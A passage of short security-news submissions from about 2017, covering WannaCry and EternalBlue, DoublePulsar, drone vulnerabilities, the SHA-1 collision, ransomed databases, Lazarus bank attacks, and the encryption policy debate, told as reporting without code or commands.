Instead, researchers from the Georgia Institute of Technology, the IMDEA Software Institute and EURECOM posit that a better approach would be an analysis of network traffic to suspicious domains that would potentially cut detection times down by weeks or even months.
The researchers’ conclusions are based on a study of five years’ worth of network traffic from a large U.S.-based internet service provider, comprised of more than five billion network events. The group had more than 26 million malware samples at their disposal, and studied DNS server requests made by malware and potentially unwanted programs (PUPs), as well as the timing around the registration of expired domains.
The researchers concluded that attackers—including spammers and adware purveyors dabbling in PUPs—re-use infrastructure over and over and that provides a better early-detection signal than an exclusive study of malware and PUP domains. They found more than 300,000 malware samples were active for at least two weeks before they were submitted to a feed such as VirusTotal or picked up and analyzed in a vendor feed.
“When we looked at when malware samples actually showed up in malware feeds where they dynamically analyzed and network signal was extracted from them, we noticed that network signal was extracted in the feed often weeks or months after we saw the first resolutions for that domain in real network traffic from a major ISP in the U.S,” said Chaz Lever of Georgia Tech, one of the report’s coauthors.
msm1267 writes: A ransomware attack running rampant through Europe today is spreading via an exploit leaked in the most recent ShadowBrokers dump.
Researchers said the attackers behind today’s outbreak of WannaCry ransomware are using EternalBlue, an exploit made public by the mysterious group in possession of offensive hacking tools allegedly developed by the NSA.
Most of the attacks are concentrated in Russia, but machines in 74 countries have been infected; researchers at Kaspersky Lab said they’ve recorded more than 45,000 infections so far on their sensors, and expect that number to climb.
Sixteen National Health Service (NHS) organizations in the U.K., several large telecommunications companies and utilities in Spain, and other business throughout Europe have been infected. Critical services are being interrupted at hospitals across England, and in other locations, businesses are shutting down IT systems.
msm1267 writes: Drones, many readily available on ecommerce shops such as Amazon, are plagued by vulnerabilities that could give attackers full root access, read or delete files, or crash the device.
The United States Computer Emergency Readiness Team (US-CERT) published a warning about one model, the DBPOWER U818A WiFi quadcopter, last month, but according to the researcher who reported the vulnerabilities, multiple drone models– manufactured by the same company but sold under different names – are also vulnerable.
The drones contain two appealing attack vectors: an open access point and a misconfigured FTP server. If an attacker was within WiFi range of the drone they could easily obtain read and write permissions to the drone’s filesystem and modify its root password.
Like any attack dependent on Wi-Fi, an attacker would need to be in close proximity to the drone to carry out an attack, but reasons that an attacker could connect their computer to the drone access point, essentially treating it as a proxy to spy on the device’s live feed or the drone’s open ports.
msm1267 writes: A little more than two weeks after the latest ShadowBrokers leak of NSA hacking tools, experts are certain that the DoublePulsar post-exploitation Windows kernel attack will have similar staying power to the Conficker bug, and that pen-testers will be finding servers exposed to the flaws patched in MS17-010 for years to come.
MS17-010 was released in March and it closes a number of holes in Windows SMB Server exploited by the NSA. Exploits such as EternalBlue, EternalChampion, EternalSynergy and EternalRomance that are part of the Fuzzbunch exploit platform all drop DoublePulsar onto compromised hosts. DoublePulsar is a sophisticated memory-based kernel payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish.
“This is a full ring0 payload that gives you full control over the system and you can do what you want to it,” said Sean Dillon, senior security analyst at RiskSense. Dillon was the first to reverse-engineer a DoublePulsar payload, and published his analysis last Friday.
“This is going to be on networks for years to come. The last major vulnerability of this class was MS08-067, and it’s still found in a lot of places,” Dillon said. “I find it everywhere. This is the most critical Windows patch since that vulnerability.”
Dan Tentler, founder and CEO of Phobos Group, said internet-net wide scans he’s running have found about 3.1 percent of vulnerable machines are already infected (between 62,000 and 65,000 so far), and that percentage is likely to go up as scans continue.
“This is easily describable as a bloodbath,” Tentler said.
msm1267 writes: Malware scanning services could be the next listening outpost for criminals and nation-state attackers as more of these services such as VirusTotal are becoming containers for personal, business and even classified information because of some organizations’ policy decision to upload every file, document and email for analysis.
Markus Neis, threat intelligence manager at Swisscom AG, this week joined the growing throng of experts warning organizations to be more selective about data sent to scanning services. At the Kaspersky Lab Security Analyst Summit, Neis shared his research into the problem and how with some crafted Yara rules he was able to return thousands of emails marked as confidential, as well as corporate business plans, government emails and 800 FBI Flash Alerts marked as either Amber or Red through the Traffic Light Protocol, neither designation of which is meant to be shared and is considered classified. Neis said there are no shortage of PGP keys, VPN credentials and SSH private keys sitting in documents uploaded to VirusTotal and surely other scanning services.
msm1267 writes: The Lazarus Group, a nation-state level of attacker tied to the 2014 attacks on Sony Pictures Entertainment, has splintered off a portion of its operation to concentrate on stealing money to fund itself.
The group, widely believed to be North Korean, has been linked to a February 2016 attack against the Bangladesh Central bank that resulted in more than $850 million in fraudulent SWIFT network transactions, $80 million of which still has not been recovered.
At the Security Analyst Summit, researchers from Kaspersky Lab and BAE Systems explained how the splinter group, known as Bluenoroff, has almost exclusively hit financial institutions, casinos, financial trade software development companies and cryptocurrency businesses. The group has also been connected to an attack earlier this year against banks in Poland, based on code strings and wiper malware discovered and known to be part of Lazarus’ arsenal.
msm1267 writes: Two critics of the government's Going Dark arguments against strong cryptography and encrypted secure messaging applications released a paper that describes a taxonomy of available encryption workarounds available to law enforcement.
The paper is not proscriptive. Instead, it explains the technological advantages and shortcomings to six workarounds available to the FBI and local law enforcement in criminal investigations. The paper also explains potential tech and legal hurdles to each.
It also explains difficult conceptual areas for policymakers, many of whom are not schooled technologists and are much more likely to be swayed by emotional and political arguments against crypto, without solid technical reasoning.
msm1267 writes: Recent academic work looking at the degradation of security occurring when HTTPS inspection tools are sitting in TLS traffic streams has been escalated by an alert published Thursday by the Department of Homeland Security.
DHS’ US-CERT warned enterprises that running standalone inspection appliances or other security products with this capability often has a negative effect on secure communication between clients and servers.
“All systems behind a hypertext transfer protocol secure (HTTPS) interception product are potentially affected,” US-CERT said in its alert.
HTTPS inspection boxes sit between clients and servers, decrypting and inspecting encrypted traffic before re-encrypting it and forwarding it to the destination server. A network administrator can only verify the security between the client and the HTTP inspection tool, which essentially acts as a man-in-the-middle proxy. The client cannot verify how the inspection tool is validating certificates, or whether there is an attacker positioned between the proxy and the target server.
msm1267 writes: Security researchers say malicious traffic generated by exploit kit infections has dropped off 300 percent since 2015. A number of high-profile arrests, including the takedown of the criminals behind the Lurk Trojan and the Angler Exploit Kit, are largely contributing to the silence among exploit kit purveyors on the black market.
Criminals, however, aren't staying still. The dropoff in exploit kit traffic has coincided with a resurgence of some old-school malware distribution techniques such as macro malware and other email-based attacks that are largely responsible for the spread of ransomware, banking Trojans and other threats.
msm1267 writes: Malicious traffic stemming from exploits against the Apache Struts 2 vulnerability disclosed and patched this week has tapered off since Wednesday.
Researchers at Rapid7 published an analysis of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.
Cisco Talos said on Thursday that attacks had risen sharply since word leaked of publicly available exploits and a Metasploit module. But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.
Rapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.
“We are really seeing limited attempts to exploit the vulnerability,” said Tom Sellers, threat analyst and security researcher at Rapid7.
msm1267 writes: FBI Director James Comey resurrected the Going Dark debate over strong encryption Wednesday at a cybersecurity conference at Boston College. Comey said the bureau has 1,200 devices it cannot decrypt that were seized at the end of last year; the director used this data point as an illustration of how secure messaging apps and strong encryption hamper criminal and national security investigations.
Comey said it was time for an "adult conversation" about strong encryption, and said that secure apps such as Signal and WhatsApp that offer end-to-end encryption are now default tools for criminals such as drug dealers and pedophiles, whereas prior to the Snowden leak, they were almost exclusively the purview of nation-state actors.
msm1267 writes: Linux providers are busy developing and pushing out patches for a vulnerability in an obscure networking protocol that could allow a local attacker to crash the kernel and elevate privileges.
Google software engineer Andrey Konovalov privately disclosed the vulnerability on Monday. The use-after-free bug could expose Linux servers to memory-based attacks that would allow an attacker to gain root-level privileges and execute code. Konovalov said he will give admins a few days to patch before publishing his proof-of-concept exploit.
The vulnerability, CVE-2017-6074, affects only the IPv6 implementation of the Linux kernel’s Datagram Congestion Control Protocol (DCCP). DCCP is used to manage network traffic congestion on the application layer; it works on both IPv4 and IPv6. No known exploits are in the wild for this bug. In fact, DCCP is largely turned off in most Linux implementations; Red Hat said it combed years-worth of customer support cases and was unable to find any reports of customers having turned it on.
The Linux kernel has been patched, while Linux providers are rolling out patches for their various implementations.
ad454 writes: Today, 10 years after of SHA-1 was first introduced, we are announcing the first practical technique for generating a collision. This represents the culmination of two years of research that sprung from a collaboration between the CWI Institute in Amsterdam and Google. We've summarized how we went about generating a collision below. As a proof of the attack, we are releasing two PDFs that have identical SHA-1 hashes but different content.
msm1267 writes: Recent attacks against insecure MongoDB, Hadoop and CouchDB installations represent a new phase in online extortion, born from ransomware’s roots with the promise of becoming a nemesis for years to come.
“These types of attacks have grown from ones of opportunity to full-scale automated and systematic assaults targeting misconfigured servers containing sensitive data that can be easily hijacked,” said Zohar Alon, co-founder and CEO, security firm Dome9.
Security researchers at Rapid7 estimate that 50 percent of the 56,000 vulnerable MongoDB servers have been ransomed. When it comes to similar misconfigured databases; 58 percent of the 18,000 vulnerable Elasticsearch servers have been ransomed and of the 4,500 CouchDB servers vulnerable 10 percent have been ransomed.
“It’s about the path of least resistance for hackers interested in the biggest potential reward,” said Bob Rudis, chief data security officer at Rapid7. “Hackers have decided it’s easier to end-run an enterprise’s multi-million dollar security system and instead simply target an open server.”
msm1267 writes: Macro-based malware has crossed the divide between the Windows and Mac platforms.
A cybercrime group whose command and control infrastructure resolves to an IP address geo-located in Russia is using a Word document laced with a malicious macro that executes solely on macOS.
Following the same script as similar Windows-based attacks, the attached documents have a luring subject line, in this case: “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm.” Once a user tries to open the attachment, they’re presented with a familiar dialogue box instructing them that macros must be enabled to view the document. If the macro is enabled, it executes its payload which then tries to download the open source EmPyre post-exploitation agent.